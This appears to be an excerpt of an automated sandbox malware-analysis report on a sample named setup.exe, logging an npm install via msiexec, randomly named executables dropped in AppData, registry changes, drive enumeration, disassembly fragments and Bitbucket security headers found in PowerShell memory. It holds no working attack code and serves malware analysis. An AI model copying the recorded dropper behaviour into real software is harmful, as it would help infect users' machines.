                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-config.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-dedupe.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-deprecate.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-diff.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-dist-tag.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-docs.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-doctor.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-edit.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-exec.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-explain.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-explore.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-find-dupes.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-fund.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-help-search.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-help.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-hook.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-init.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-install-ci-test.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-install-test.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-install.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-link.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-login.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-logout.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-ls.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-org.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-outdated.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-owner.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-pack.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-ping.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-pkg.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-prefix.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-profile.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-prune.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-publish.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-query.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-rebuild.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-repo.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-restart.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-root.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-run-script.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-sbom.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-search.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-shrinkwrap.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-star.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-stars.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-start.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-stop.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-team.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-test.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-token.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-uninstall.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-unpublish.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-unstar.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-update.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-version.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-view.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-whoami.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npx.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\folders.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\install.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\npm-global.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\npm-json.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\npm-shrinkwrap-json.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\npmrc.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\package-json.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\package-lock-json.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\config.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\dependency-selectors.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\developers.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\logging.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\orgs.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\package-spec.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\registry.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\removal.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\scope.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\scripts.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\workspaces.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\LICENSE
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\package.json
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\safe.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\examples
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\examples\normal-usage.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\examples\safe-string.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\colors.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\extendStringPrototype.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\index.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\styles.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\custom
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\custom\trap.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\custom\zalgo.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\america.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\rainbow.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\random.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\zebra.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\system
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\system\has-flag.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\system\supports-colors.js
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\88c8a67e-b76c-5548-94d2-8ef2a7b533d5Jump to behavior
                        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup.exe.logJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\LICENSE.electron.txtJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Programs\Steam\LICENSE.electron.txtJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\nodejs\node_modules\npm\node_modules\@isaacs\cliui\LICENSE.txt
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\nodejs\node_modules\npm\node_modules\@isaacs\cliui\node_modules\emoji-regex\LICENSE-MIT.txt
                        Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D3DCompiler_47.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2487882361.000000000321F000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: okdtlfsk.k4u1.exe, 00000009.00000003.2342047181.00000000009E0000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2342732409.0000000003EA0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2357494956.0000000004F60000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: okdtlfsk.k4u1.exe, 00000009.00000003.2343229505.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2343681612.0000000004040000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2358387982.0000000004E40000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2359890037.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: okdtlfsk.k4u1.exe, 00000009.00000003.2336864238.0000000004010000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2336456237.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2352993005.0000000005030000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\libEGL.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2495223655.0000000003F2D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\dev\test\Release\test.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2570536977.0000000003422000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2489150717.0000000003211000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: okdtlfsk.k4u1.exe, 00000009.00000003.2339494064.0000000003FC0000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2337741119.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2354920236.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D3DCompiler_47.pdbGCTL source: okdtlfsk.k4u3.exe, 0000000B.00000003.2487882361.000000000321F000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: okdtlfsk.k4u1.exe, 00000009.00000003.2336864238.0000000004010000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2336456237.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2352993005.0000000005030000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: okdtlfsk.k4u1.exe, 00000009.00000003.2339494064.0000000003FC0000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2337741119.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2354920236.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2565575559.000000000322B000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2483878531.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: okdtlfsk.k4u1.exe, 00000009.00000003.2342047181.00000000009E0000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2342732409.0000000003EA0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2357494956.0000000004F60000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: okdtlfsk.k4u1.exe, 00000009.00000003.2343229505.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2343681612.0000000004040000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2358387982.0000000004E40000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2359890037.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2482695452.0000000004720000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2479696981.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2479474213.0000000003AA0000.00000004.00001000.00020000.00000000.sdmp
                        Source: C:\Windows\System32\msiexec.exeFile opened: z:
                        Source: C:\Windows\System32\msiexec.exeFile opened: x:
                        Source: C:\Windows\System32\msiexec.exeFile opened: v:
                        Source: C:\Windows\System32\msiexec.exeFile opened: t:
                        Source: C:\Windows\System32\msiexec.exeFile opened: r:
                        Source: C:\Windows\System32\msiexec.exeFile opened: p:
                        Source: C:\Windows\System32\msiexec.exeFile opened: n:
                        Source: C:\Windows\System32\msiexec.exeFile opened: l:
                        Source: C:\Windows\System32\msiexec.exeFile opened: j:
                        Source: C:\Windows\System32\msiexec.exeFile opened: h:
                        Source: C:\Windows\System32\msiexec.exeFile opened: f:
                        Source: C:\Windows\System32\msiexec.exeFile opened: b:
                        Source: C:\Windows\System32\msiexec.exeFile opened: y:
                        Source: C:\Windows\System32\msiexec.exeFile opened: w:
                        Source: C:\Windows\System32\msiexec.exeFile opened: u:
                        Source: C:\Windows\System32\msiexec.exeFile opened: s:
                        Source: C:\Windows\System32\msiexec.exeFile opened: q:
                        Source: C:\Windows\System32\msiexec.exeFile opened: o:
                        Source: C:\Windows\System32\msiexec.exeFile opened: m:
                        Source: C:\Windows\System32\msiexec.exeFile opened: k:
                        Source: C:\Windows\System32\msiexec.exeFile opened: i:
                        Source: C:\Windows\System32\msiexec.exeFile opened: g:
                        Source: C:\Windows\System32\msiexec.exeFile opened: e:
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
                        Source: C:\Windows\System32\msiexec.exeFile opened: a:
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Local\Temp\2030.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then jmp 028D438Dh7_2_028D4320
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_028D2E48
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_028D2BED
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_028D2BF8
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then jmp 028D438Dh7_2_028D430F
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then jmp 028D8393h7_2_028D8349
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then jmp 028D8393h7_2_028D8358
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then jmp 028D08AEh7_2_028D0878
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_028D2E41
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then jmp 051154AEh7_2_05115478
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then jmp 051154AEh7_2_05115411
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 4x nop then jmp 051154AEh7_2_05115468

                        Networking

                        barindex
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D1AA000.00000004.00000800.00020000.00000000.sdmpString found in memory: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD45000.00000004.00000800.00020000.00000000.sdmpString found in memory: content-security-policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D1D8000.00000004.00000800.00020000.00000000.sdmpString found in memory: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net 